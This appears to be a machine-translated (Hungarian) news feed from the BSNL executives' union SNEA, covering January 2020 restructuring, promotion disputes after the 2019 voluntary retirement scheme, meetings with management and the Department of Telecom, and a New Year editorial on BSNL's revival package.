Ezt a vállalkozást már sikeresen kifejlesztette és magántulajdonban megvalósította egy LCO/TIP a Kerala Circle-i Thrissur BA-ban a BSNL technikai támogatásával a Com Anoop K J, JTO OMCR, Ernakulam vezetésével..
Kidolgoztak egy alkalmazást vezetékes hívások kezdeményezésére/fogadására mobiltelefonról WiFi-n keresztül.
Ezt a projektet a SNEA nemrégiben megtartott CWC Meetjén mutatták be Bangalore-ban 2019 augusztusában.
Különféle javaslatok érkeztek a különböző köröktől az IPTV BSNL hálózaton keresztül történő megvalósítására.
Az IPTV (vagy TV-szolgáltatás) hiányát az egyik fő okként azonosították a többszolgáltató LCO-k BSNL FTTH-kapcsolataira adott gyenge reakciójának egyik fő okaként..
A SNEA minden szinten folytatja a projektet, és örülünk, hogy látjuk a fényt az alagút végén.
Gratulálunk a BSNL házon belüli tehetségeinek, akik megmutatták valódi potenciáljukat.
Az SNEA köszönetet mond minden tisztnek, aki a projekt megvalósításán dolgozott a BSNL CO-nál és az összes Circle Office-nál, és különösen a Com-nál. P Padmanabha Rao, az AGS és DGM, a BSNL CO.
IPTV Open Policy15-01-2020
Szervezeti átalakítás: Nem területi körök összevonása.
A Karbantartási és Projektköröket egyesítették, és átnevezték Core Network-Transmission névre (Kelet/Nyugat/Észak/Dél). Külön kör északkeletre, nevezetesen maghálózati átviteli NE régió, amely lefedi az AS, NE I és NE II köröket. Hatályos 2020.04.01-től.
A Telecom Factories egyesült a megfelelő területi körökkel BA vezetőként 2020.02.01.
Az NCNGN Circle egyesült a BBNW Circle-lel.
Nodal Center Chandigarh egyesült a Punjab Circle-lel.
Csak egy kiképzőkör székhellyel az ALTTC-nél, Gaziabadban. Az ALTTC, NATFM és BRBRAITT BA fejként fog működni. A jövőben csak zónális RTTC-k.
Kísérő levél melléklet15-01-2020
14-01-2020
A GS ezt írja Shri P K Purwarnak, CMD/BSNL:
Kérjük, azonnal intézkedjen Rendszeres promóció a gondoskodás helyett különböző fokozatokban a már magasabb skálán dolgozó Vezetők közül puszta tervezési változtatással a VRS 2019 által a terepegységekben keletkezett hatalmas vákuumot kitölteni, és a vezetőket többletmunka vállalására ösztönözni:
A rendelkezésre álló adatok szerint 2020.02.01.
i) Csak 57 DGM(T) lesz elérhető a szankcionált 1481-es erősséggel szemben.
ii) Csak 32 DGM(Fin) lesz elérhető a szankcionált 402-es erősséggel szemben.
iii) Csak 1746 AGM(T) lesz elérhető a BSNL-ben az egy évvel ezelőtti 6500 AGM helyett. A DGM promóció során a közgyűlések száma körülbelül 1200 lesz, kevesebb, mint 20%. A 15 éves szolgálattal rendelkező SDE-k promócióra várnak.
iv) Csak 70 CAO lesz elérhető a szankcionált 1347-es erősséggel szemben. Ezek még arra sem lesznek elegendőek, hogy ember a betöltetlen DGM(Fin) állások.
v) Több ezer magasabb szintű vezető dolgozik JTO, SDE egyenértékű besorolásban 5-30 évig, és vár az előléptetésre. Az 1988-tól toborzott JTO-k előléptetésre várnak az Arch szárnyban. Több ezer JTO 1999, 2001 és 2008, 2010, 2013 stb. sorozatból várja az első promóciót. A JTO (Civil/Elect/TF) szárny állapota ugyanilyen rossz.
Teljesen ellenezzük, hogy a vezetőség a rendszeres promóció helyett az elterjedt utánpótlási megállapodást kövesse. Az ügyvezetők már magasabb beosztásban dolgoznak, és rendszeresen magasabb besorolási fokozatba léptethetik őket, pusztán a kinevezés megváltoztatásával, az LA megállapodás helyett.
GS levél a CMD-nek11-01-2020
Találkozó Shri Arvind Vadnerkarral, DIR(HR) 2020.09.01-én: GS, az elnök és mindkét AGS találkozott a DIR(HR)-vel Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) és GMs(Pers) jelenlétében, és megbeszéléseket folytattak a következő kérdésekről:
Személyzeti normák és a BSNL szerkezetátalakítása: Elmondtuk, hogy a Restg cella által kiadott munkaerő-kölcsönzési norma egyáltalán nem működőképes, mivel a terepi realitásokat a vezetés nem veszi figyelembe. Az ideiglenes normák szerint néhány ma GM-ek által vezetett SSA-t a jövőben SDE-nek kell vezetnie. Sok kis SSA lesz hatalmas földrajzi területtel, ahol csak egy vagy két ügyvezető lesz indokolt. Ezeken a területeken gyakorlatilag lehetetlen lesz fenntartani a szolgáltatásokat. Az outsourcing révén az ügyvezetők szerepe és felelőssége nem csökken, különösen a CFA szegmensben. Vidéki területeken a Transmission, BTS mtce, EB, Kábelkarbantartás SDE-vel (Group) való összefogása hatalmas területeken meghiúsítja a célt. Hasonlóképpen, a városi területekre vonatkozó normák is szigorúak. Az ideiglenes normákat tehát azonnal át kell dolgozni. Ellenkező esetben senki nem jelentkezik a külső üzembe és a Trans mtce-be dolgozni, és akik szintén dolgoznak, azok kiküldetést kérnek beltéri, mobil stb. Hasonlóképpen, sok SSA-ban nincsenek megjelölve a helyettesítők a 2020.01.31-i zökkenőmentes átvétel érdekében. Az igazgató és a GM (Restg) elmagyarázta, hogy csak ideiglenes normákat lehet felülvizsgálni. Azonnali felülvizsgálatot kértünk.
Kifejtettük továbbá a terepi egységek azon igényét, hogy az elsődleges kábel karbantartása is szerepeljen a kihelyezési pályázatban. A rendelkezésre álló TT-k közül nagyon kevesen ismerik a kábelkötéseket, és nem elegendőek az összes elsődleges kábel karbantartásához. Mások szükségesek a beltéri/MDF/erőművi karbantartáshoz. Ezeket a tényeket a DIR(CFA)-val folytatott megbeszélésen kifejtették, de eddig nem születtek kedvező döntések. A DIR(HR) biztosította, hogy újra felhívja a DIR(CFA) figyelmét erre a fontos kérdésre.
Promóciók a VRS utáni forgatókönyvben és a rendszeres promóció szükségessége a Lookafter helyett: Határozottan tiltakoztunk a lépés ellen, amiért a rendszeres promóció helyett Look after megállapodást adtunk. A VRS után 2020.01.31-én szinte DGM(T/Fin) állások és AGM/CAO/EE besorolási fokozatok megüresednek, és azonnali lépéseket kell tenni az előléptetés érdekében – követeltük. Mivel nagyszámú, kellő gyakorlattal rendelkező Vezető dolgozik magasabb skálán, egyszerűen kinevezésváltással előléptethetők – mutattuk rá. Hasonlóképpen több ezer különböző szárnyú JTO már magasabb skálán van, és újbóli kijelöléssel előléptethetők. Még DPC sem szükséges. Az LA megállapodás ellentétes az ügyvezetők érdekeivel, mivel elveszítik a szolgáltatást és a jövőbeni promóciós lehetőségeket. A vezetőség LA-éveket tölt együtt, és tagadja a rendszeres előléptetéseket. Követeltük ennek a mechanizmusnak a leállítását, és rendszeres promóciók biztosítását minden jogosult vezető számára.
a DGM promócióiról,Az SNEA ismertette a 2020. január 1-i találkozót a DoT titkárral, valamint a DGM-előléptetéseket engedélyező pozitív döntését. Még a DoT is Sr DDG (CGM) szintű előléptetést adott 2019. 12. 30-án a 2019. 12. 31-én nyugdíjba vonulókat, de a BSNL nem tesz semmit annak érdekében, hogy nyugdíjazásuk előtt előléptesse a betöltetlen állásokat. A megbeszélés után a DIR(HR) biztosította, hogy megbeszélést folytat a titkárral/DoT-vel és a CMD/BSNL-lel, és megteszi a szükséges lépéseket a DGM promócióihoz.
A 2001-es Rect JTO-k visszaállítása megfelelt az LDCE -2007 szabványnak: Az üggyel kapcsolatban ismét megbeszélést folytattak, és az Assn az SDE RR 12. záradékára, 5. megjegyzésére, valamint a 2007-ben kiadott, az LDCE-2007-ben való megjelenésre való jogosultságukra vonatkozó magyarázatokra hivatkozva magyarázta el jogosultságukat. Az LDCE 2010-hez 2012-ben kiadott pontosítások alapján most néhányat visszaállítottak. Az LDCE 2007-ben és az LDCE 2010-ben való megjelenésre vonatkozó pontosítások teljesen eltérőek, és ez bonyolította a kérdést. A jogosultságot az LDCE 2007-re kiadott pontosítások alapján kell eldönteni, követeltük. Mivel már SDE-vé váltak, nem tudták megírni a következő, 2012-ben és 2015-ben megtartott DCE-t. Köztük is a TN Circle egyes SDE-jei, amelyek visszafordításra néznek, míg mások kiszolgálnak csak okot jeleznek. Követeltük a visszaállítási folyamat leállítását, amíg a vezetés elé állított tények alapján nem döntenek az ügyben. Javasoltuk egy bizottság létrehozását az ügy megvizsgálására. Végül a DIR(HR) utasította az érintett tiszteket, hogy a megfelelő döntés meghozatala érdekében másnap maga hozza be az összes kapcsolódó aktát.
10-01-2020
10-01-2020
10-01-2020
Találkozó Shri P. K. Purwarral, CMD BSNL 2020.01.10-én: Az AIBSNLEA és az SNEA főtitkárai és AGS-ei ma találkoztak a CMD BSNL-lel, és a következő kérdésekről tárgyaltak:
DGM(T) promóciók:A DET-ből a DGM-be (T) való előléptetésekkel kapcsolatban ismertettük a 2020. január 1-i és január 3-i találkozót (T) DoT titkárral, amelyen a titkár (T) beleegyezett a DGM (T) előléptetésébe, feltéve, hogy az nem okoz további pénzügyi vonzatokat. A CMD BSNL arról tájékoztatott, hogy a miniszterrel (T) is tárgyalt ezzel kapcsolatban, és megpróbálta megtenni a szükséges lépéseket.
Az alkalmazottak fizetéséből behajtandó függőben lévő díjak elszámolása: A CMD arról tájékoztatott, hogy a GPF-visszafizetések kifizetését a VRS-optiesek tekintetében, mintegy 710 millió Rs, hétfőn teszik közzé. A többi illetéket is legkorábban elszámolják.
Promóciók a VRS után megüresedett állások betöltésére: Az előléptetésekkel kapcsolatban a CMD azon a véleményen van, hogy az alkalmazottaknak legalább egy évre el kell felejteniük az előléptetéseket, és keményen kell dolgozniuk a BSNL újjáélesztéséért. Úgy vélte továbbá, hogy a jövőben több érdemet kell bevezetni az előléptetésekbe. Elmagyaráztuk a valóságot. A Telecom & Finance Wings, valamint az AGM és CAO szinte minden DGM álláshelye megüresedik 2020. 01. 31. után, és ezt követően nehéz lesz a BSNL-t működtetni anélkül, hogy ezeket a megüresedett állásokat azonnal be kellene tölteni. A JTO és az SDE kádereiben stagnálás van, és előléptetéseiket nem lehet halogatni. A JTO-k és JAO-k toborzásakor, valamint a JTO-ból SDE-be történő előléptetéskor elérhető a versenyvizsga, és az előléptetéskor jogosult vezetők gyakorlatilag 50%-a csak versenykvótából származik – magyaráztuk. A CMD BSNL megállapodott az AGM, CAO és DGM álláshelyek hiányáról a VRS 2019 után.
Búcsú a nyugdíjba vonuló dolgozóktól: A nyugdíjasok szolgáltatásainak elismeréseként kértük a 3001 Rs/- összeg visszaállítását, mivel ez csak a BSNL-ben végzett korábbi szolgáltatásaik elismerése és a számukra ért megtiszteltetés jele. A CMD közölte, hogy a BSNL pénzszűke miatt képtelen volt. Ebben az esetben valamilyen alternatív megoldást javasoltunk, például az összegnek megfelelő kuponok feltöltését. A CMD nagyra értékelte javaslatunkat, és beleegyezett, hogy a Cash Award helyett alternatív megoldást keressen.
USOF projektek kiosztása a BSNL számára jelölési alapon: Értékeltük a CMD BSNL-t az USOF-projektek BSNL-hez való jelölési alapon történő allokálásával kapcsolatban. A CMD BSNL megemlítette, hogy mindent meg kell tennünk. Projektek/ USOF Projektek és teljesítményünk az előző években nagyon jó volt, és teljesítettük a Korm. Projektek határidőn belül. Azonban úgy érezzük, hogy ha jelölési alapon adják, az jó lesz a BSNL-nek, különben ha pályázaton versenyzünk, az nem biztos, hogy előnyös a BSNL számára.
Az elsődleges kábelek karbantartása: Továbbá értékeltük a CMD-t azokról a nehézségekről, amelyekkel a vezetők és a különböző körök a VRS utáni forgatókönyvben szembesülnek az elsődleges kábelek karbantartása során, mivel a vállalati iroda nem adta ki az elsődleges kábel karbantartására vonatkozó utasításokat. A CMD BSNL megemlítette, hogy a különböző államokban folyó fejlesztési munkálatok miatt az elsődleges kábelt gyakran kell cserélni/karbantartani, különböző helyi állami kormányzat engedélyével. Szervezetek / Autópálya Hatóságok, amelyeknél az Ajánlattevő nem jelentkezhet, és a karbantartási munkánkat súlyosan megsínyli.
MDF karbantartása:Könyörögtünk a CMD BSNL-nek, hogy az MDF irányítása a BSNL személyzetén belül legyen. A CMD BSNL megemlítette, hogy fiatal munkatársainknak elő kell állniuk, meg kell ragadniuk a fontos munkákat és vállalniuk kell a felelősséget. A CMD megemlítette továbbá, hogy a VRS utáni forgatókönyvben alkalmazott munkaerőhiány miatt előfordulhat, hogy a BSNL személyzete nem tudja éjjel-nappal fenntartani az MDF-et. Részletes megbeszélés után a CMD biztosítja, hogy három hónap elteltével felülvizsgálja a helyzetet.
08-01-2020
08-01-2020
Az SNEA szolidaritást és erkölcsi támogatást nyújt a Központi Szakszervezetek 2020.08.01-i általános sztrájkjához a közszféra privatizációja és egyéb követelései ellen.
07-01-2020
07-01-2020
Az Assam Circle Kör Végrehajtó Bizottságának ülését Guwahatiban tartották 2020.04.01-én. A GS és a Jt Sec (East) felszólalt a CEC kiterjesztett ülésén. A CHQ vezetői emlékeztek a magas rangú vezetők és az aktivisták közreműködésére a VRS-ben. Ők vezetik az Egyesületet a különböző igények megoldásáért vívott küzdelmek során, munkájukat örökre emlékezni fogjuk. Az összes díjat 2020.01.31-ig rendezik, és a BSNL-től való elválásuk zökkenőmentes lesz.
Évekig tartó küzdelmeink végül jó eredményeket hozott a BSNL számára. A vezetőség és a kormány sokféle eszközzel próbálta elfojtani a küzdelmet, fizetéscsökkentéssel, díjtáblázattal, okiratokkal stb., de soha nem kötöttünk kompromisszumot. Végül a küzdelmünk a 4G spektrumot ingyenesen hoztuk ki, ahogyan kértük, jóváhagyták a föld bevételét, a VRS teljes kiadását a kormány viselte, 8500 Cr-os államgaranciás kötvényt jóváhagytak pénzügyi támogatásra stb.
Fő fókuszunk a BSNL újjáélesztése. A 4G bevezetését 2020.03.01-re tervezik. A tarifa növekszik, ami jó jel az ipar és a BSNL számára. Ha a vezetés képes bevezetni egy jó mechanizmust, amely megerősíti az alkalmazottak bizalmát, az újjáéledés nagyon is lehetséges. Minden a menedzsmenten múlik.
Vállalati szinten a BSNL szerkezetátalakítása folyik. A megváltozott forgatókönyv szerint a CFA-munka kiszervezésére iránymutatások születnek. Attól tartunk azonban, hogy a szigorú feltételek miatt sok helyen meghibásodhat, és a BSNL-nek nagy baja lesz a szolgáltatások fenntartásával 2020.02.01. után – tájékoztattuk a vezetőséget. Előfordulhat, hogy a tapasztalt munkások nem vehetnek részt a pályázaton. Hasonló munka folyik más vertikumokban is.
Attól tartunk, a HR vertikumban az átalakítások miatt drasztikusan csökken az álláshelyek száma. A VRS különféle kihívásokat vetett, és ezek közé tartozik a postacsökkentés és a promóció. A posztcsökkentés veszélye hosszú éveken át fennállt, és erre számítva a Szövetség jó előre kidolgozott egy nem postaalapú promóciós politikát. Most teljes hangsúlyt fektetünk a korai megvalósításra, azaz a 2018.07.01-i határidővel.
Sajnos néhány Executive Assn még mindig igényes poszt alapú előléptetés egy leendő időponttól(kevés üresedés esetén) és segíti a vezetőséget az új előléptetési politika végrehajtásának leállításában. A vezetőség nem ad posztalapú előléptetést a lenézés és a szerkezetátalakítás nevében, ugyanakkor nem hajtja végre az új politikát. Mindannyian jogosultak az előléptetésre magától 07/01/18-tól, de ragaszkodnak a jövőbeli előléptetéshez! Az a lehetőség, amelyet tavaly kaptunk az SDE promóciójára az összes SDE poszton, amit elrontottak a megvetési petícióval kapcsolatos hajthatatlan hozzáállás és a CMD és a GM(Pers) személyes megjelenése a CAT/Ernakulamban.
Az új előléptetés minden vezető számára előnyös lesz, biztosítva a zökkenőmentes karrier előrehaladást az AGM fokozatig. Az összes JTO 2014-ig SDE-vé válhat, és az összes SDE 2016-ig Sr SDE/Sr AO vagy AGM/CAO lehet mostantól. Az új szabályzat tartalmazza a múltbeli szolgálat súlyát. Ezáltal az SDE/AO-ból Sr SDE/Sr AO fokozatba 3 év múlva, az SDE/AO-ból az AGM/CAO fokozatba 8 év múlva lesz, ami a megváltozott forgatókönyvben elképzelhetetlen. A VRS után drasztikusan csökkenni fog a posztok száma az összes káderben.
Tartós küzdelemmel és folyamatos meggyőzéssel a múltban sok kérdést meg tudtunk rendezni. 2018-ban rekordszámú promóciót adhattunk, amire a BSNL vagy a DoT történetében még nem volt példa. A BSNL közvetlen munkavállalóinak konkrét kérdései, mint i) EPF hozzájárulás plafon nélkül, ii) 5% nyugdíjjáradék stb. Továbbra is törekszünk a fennmaradó problémák megoldására, mindenki támogatásával.
06-01-2020
Az Assam Circle Kör Végrehajtó Bizottságának ülését Guwahatiban tartották 2020.04.01-én. A GS és a Jt Sec (East) részt vett és felszólalt az ülésen. A CEC egyhangúlag a következő köri hivatalokat választotta:
A kör elnöke: Com Suresh Bora, AGM.
A kör titkára: Com Borun Baruah, JTO.
Pénztáros: Com Allauddin Ahmed, AO.
Az együttműködés szükségessé vált, mivel a korábbi OB-k a VRS 2019 mellett döntöttek. Az SNEA elismeri a sok éves hozzájárulásukat, és minden jót kíván nekik.
A SNEA CHQ sok sikert kíván az újonnan megválasztott fiatal csapatnak.
03-01-2020
Médiajelentések megtekintése:
Az állami irányítás alatt álló Bharat Sanchar Nigam Limited (BSNL) továbbra is a bürokratikus bizonytalanság következtében a potenciális bevételi lehetőségek eróziójához vezet a 20 000 millió rúpiás mega-összeköttetési programok miatt, annak ellenére, hogy a Központ a stresszes távközlési társaság újjáélesztésére törekszik. .
03-01-2020
03-01-2020
Interakció az M/s Deloitte tanácsadóval:
A BSNL vezetősége 2020.02.01-én találkozót szervezett a Deloitte M/s tanácsadóval, akit a BSNL-szolgáltatások folyamatosságára vonatkozó ajánlások megtételére jelöltek ki a VRS utáni forgatókönyvben és a rövid távú intézkedésekben.
A GS, az elnök és mindkét AGS részletes megbeszélést folytatott a tanácsadóval körülbelül két órán keresztül 16:00 és 18:00 óra között, összpontosítva minden olyan kérdésre, amely a VRS utáni forgatókönyvben felmerülhet. A tanácsadó akut hiányt azonosított a DGM, AGM és TT(TM) káderekben, amelyek hatással lesznek a VRS után.
A megbeszélések középpontjában a terepi egységek helyszíni valósága, hogyan fog hatni a VRS után, azonnali intézkedések a hatás csökkentésére, ügyfélkapcsolat a VRS utáni forgatókönyvben, az SSA és a Circle egyesülése, a jelenlegi BA-struktúra hátránya, munkaerő követelmény, a személyzet motivációja stb.
02-01-2020
02-01-2020
A GS, az elnök és az AGS-ek 2020.01.01-én találkoztak a titkárral/DoT, Tag(T)/DoT, Addl titkár/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT és a DoT más vezető tisztségviselőivel. , az új év és a rövid beszélgetések. A CMD-vel és a DIR(HR)-vel olyan fontos kérdésekről szóló megbeszéléseket, mint a szerkezetátalakítás és az előléptetés, a jövő hétre rögzítették, elfoglaltságuk miatt.
A Titkárral való megbeszélésen felvettük a DGM(T) előléptetésének kérdését, amely a titkár/DoT parlamenti bizottsági ülésen adott válasza miatt leállt, miszerint DGM előléptetés csak a szerkezetátalakítás befejezése után adható ki (pl. . VRS után). Elmagyaráztuk, hogy az összes jogosult DE előléptetésben részesül, és a DE-vel kapcsolatban nincs fenntartás a DGM-re való előléptetéssel kapcsolatban, és mind a 287 DE az SC/ST kategóriába tartozik. A DE-k közül több mint 500 DE jelentkezett VRS-re, és lemarad a promócióról, ha azt 2020.01.31. után adják ki. Tájékoztatjuk továbbá, hogy 2019. 12. 30-án még a 2019. 12. 31-én nyugdíjba vonuló CGM rendfokozatú tiszteket is előléptetik és igénybe vehetik az előléptetést. De a BSNL vezetők esetében ez fordítva történik.
A megbeszélést követően a titkár közölte, hogy egyetért a DGM előléptetésével, feltéve, hogy: 1) ennek nincs pénzügyi vonzata közvetlenül a VRS előtt és 2) nem hasonló keretek között bármilyen problémát létrehozni. Elmagyaráztuk, hogy ennek nincs pénzügyi vonzata, és mindegyik magasabb léptékben dolgozik, és nem okoz problémát a hasonló kádereknél, mivel a DGM előléptetése 2017 után perek miatt elhalasztja.
Ezután a titkár biztosított minket, hogy beszéljünk a CMD-vel, és ha az információ helyes, akkor engedélyt ad a DGM előléptetésére.
01-01-2020
01-01-2020
szerkesztőségi
2019: viharos időszak a BSNL történetében. Példátlan Egység és Szolidaritás révén sikeresen túljutottunk rajta
Az új év új reményeket tár fel új kihívásokkal
2019-ben viharos időket éltünk át, amelyeknek a BSNL történetében soha nem voltunk tanúi a BSNL újjáélesztését követelő egymás utáni izgalmaknak. Ez valóban tegyél vagy halj csata volt a BSNL alkalmazottai számára. A SNEA minden elkötelezett tagja az egész egy évet a BSNL újjáélesztésének szentelte, mivel minden helyesen gondolkodó BSNL-vezető tudatában volt annak, hogy jövője teljes mértékben a BSNL jövőjétől függ. Sajnos ebben a döntő időszakban az alkalmazottak egy része, különösen egyes vezetők is távol tartották magukat a mainstream küzdelmektől, mintha a BSNL összeomlásának semmi köze nem lenne hozzájuk. Fel kell ismerniük a hibákat, és csatlakozniuk kell a mainstreamhez, különben a Vezetőknek fel kell hívniuk a mainstream megerősítésére, elhagyva a negatív erőket.
Igen, tanúi voltunk a vezetés és a kormány által az egyesületek és szakszervezetek ellen indított elnyomó intézkedéseknek, amelyek arra kényszerítették őket, hogy hagyják abba az izgalmakat és küzdelmeket, lehetővé téve a BSNL természetes halálát a vereség elfogadásával. De soha nem engedtük meg, hiszen különböző dolgokból készültünk, készen álltunk minden áldozatra, és készen álltunk a végsőkig harcolni, amíg el nem érjük célunkat. Igen, ez egy tegyél vagy halj csata volt mindannyiunk számára, amelyet bármi áron meg kell nyernünk.
Kezdetben a kormány egyáltalán nem gondolta komolyan a BSNL újjáélesztését. Az összes minisztérium ellenezte az ébredési tervet. A kormány a BSNL természetes halálát várta. A Pénzügyminisztérium annyira ellenséges volt, ellenezte mindenfajta Revival-csomagot, és ragaszkodott a BSNL és az MTNL bezárásához. A küzdelem, a BSNL alkalmazottainak sikeres erőfeszítései mellett, hogy a közvéleményt és a médiát a BSNL Revival mellett alakítsák ki, valóban csodákat művelt. A SNEA minden ilyen tevékenységben az élen járt. Az általunk keltett kényszer a politikai beavatkozásra végre bevált. A Hon MoC őszinte erőfeszítései és a GoM megalakítására tett erőfeszítései, amelynek elnöke a belügyminiszter, valamint mindkét titkár/DoT és mindkét CMD/BSNL őszinte erőfeszítései meghozták a dolgokat. A tisztelt miniszterelnök közbelépésére tett erőfeszítéseink és a tisztelt miniszterelnök végső felhívása, hogy adjunk egy jó Revival csomagot, amely valóban segíti a BSNL újjáéledését, a legdöntőbb tényező volt.
Végül a BSNL és MTNL újjáélesztési csomagját 2019. 10. 23-án jóváhagyta a Union Cabinet, új életet adva a BSNL-nek és az MTNL-nek. A csomagban rejlik a valódi potenciál a BSNL újjáélesztésére. A 4G spektrum 14 155 millió rúpia plusz 18%-os ÁFA-díját az általunk követelt kormány viseli. Az AUAB kezdettől fogva azt követelte, hogy a kormány biztosítson ingyenes 4G spektrumot a BSNL számára. A kötelezettségek elszámolására és a CAPEX teljesítésére szolgáló telek pénzzé tétele szintén megkapta a kabinet jóváhagyását. Pénzügyi segítségnyújtási igényünk 10 éves hosszú lejáratú, 15 000 Kronás kötvény formájában is megvalósult a BSNL és az MTNL számára állami szuverén garanciával. Aggodalmunk az MTNL és a BSNL egyesülésével kapcsolatban, azaz a hatalmas pénzügyi felelősség, a tőzsdén jegyzett társasági státusz és az összetett HR-kérdések az egyesülés előtt foglalkoznak. A VRS-re vonatkozó mintegy 15 000 koronás teljes felelősség a kormányt terheli, mivel elleneztük a BSNL-re háruló további pénzügyi terheket a VRS nevében. Az 5G spektrum felosztása egy másik kedvenc döntés a kilátásban.
A BSNL minden egyes alkalmazottja, különösen a SNEA elvtársa dédelgetheti ezt a csodálatos eredményt, amely újabb történelmet teremt a Szakszervezeti mozgalomban. Igen Elvtársak, történelmet teremtettünk úgy, hogy vállvetve küzdöttünk más alkalmazottakkal, a cég újjáélesztéséért, példát mutatva más szektoroknak. Nagyon büszke és szerencsés vagyok, hogy részese lehetek egy ilyen küzdelemnek, és a legnehezebb időszakban az AUAB zászlajában a küzdelem élére állva vezethetem az elkötelezett tagok egyesületét. Ezek az élet emlékezetes pillanatai.
Most 2020 küszöbén állunk, sok reménnyel és várakozással. Pozitivitást keresünk a BSNL-ben. A BSNL revival az első ezek közül.
Nem szabad késleltetni a 4G pán-indiai alapon történő elindítását a kijelölt spektrumon. A vásárlók izgatottan várják ezt a pillanatot. Ugyanígy a BSNL felelősséggel tartozik a kormánynak az ingyenes 4G spektrum kiosztása után is. A hálózat korszerűsítését fel kell gyorsítani. A működési kérdések és a munkásokkal, vállalkozókkal, eladókkal, földtulajdonosokkal stb. szemben fennálló tartozások elszámolása jelentik az azonnali kihívásokat annak érdekében, hogy bármilyen outsourcing modell sikeres legyen. A BSNL-nek vissza kell szereznie a bizalmat közöttük azáltal, hogy elszámolja a megnyíló illetékeiket az út a jövőre nézve. A pénz realizálása államkötvényekkel és a föld monetizálásával két fontos intézkedés ebben az irányban. A vezetőségnek ki kell jönnie a VRS-szindrómából, és el kell kezdenie dolgozni ezeken a problémákon, hogy megbizonyosodjon arról, hogy a BSNL 2020.01.31. után is megszakítás nélkül szolgáltatásokat nyújt. A hűséges ügyfelek nagy része valóban aggódik a tömeges önkéntes nyugdíjazás miatt, és a mi felelősségünk, hogy visszanyerjük bizalmukat a VRS utáni forgatókönyvben. Ebben a tekintetben a vezetői döntések nagyon fontosak lesznek.
A fentiek mellett óriási jelentősége lesz annak, hogy a vezetés hogyan fogja motiválni a fennmaradó 47%-os dolgozót a teljes munkateher vállalására a VRS utáni helyzetben, hogyan töltik be a terepi egységekben keletkezett vákuumot, ami bevételt termel stb. hatással van a BSNL újjáélesztésére tett erőfeszítésekre. A magasabb szintű Executive-hiány könnyen pótolható előléptetéssel, ami az új szabályzat szerint pár napon belül, egyszerűen VC felvételével megoldható.
A DoT/Government és a BSNL vezetése nem tud több kifogást felhozni a munkavállalói költségek nevében, mivel az alkalmazottak több mint 50%-a vette át a VRS-t, túllépve a célját. Már figyelmeztettük a vezetőséget, hogy a vezetők létszámának szakszerűtlen és drasztikus csökkentése negatív hatással lesz a BSNL felélesztésére, és a jó dolgozókat meg kell tartani a BSNL-ben. Minden attól függ, hogy a vezetés hogyan hasznosítja nyereségesen a fennmaradó alkalmazottakat a VRS utáni forgatókönyvben. A professzionális megközelítés és a gyors politikai döntések ismét visszahozhatják a BSNL-t.
Reméljük, hogy 2020 jó hírekkel szolgál a BSNL és az egész nemzet számára.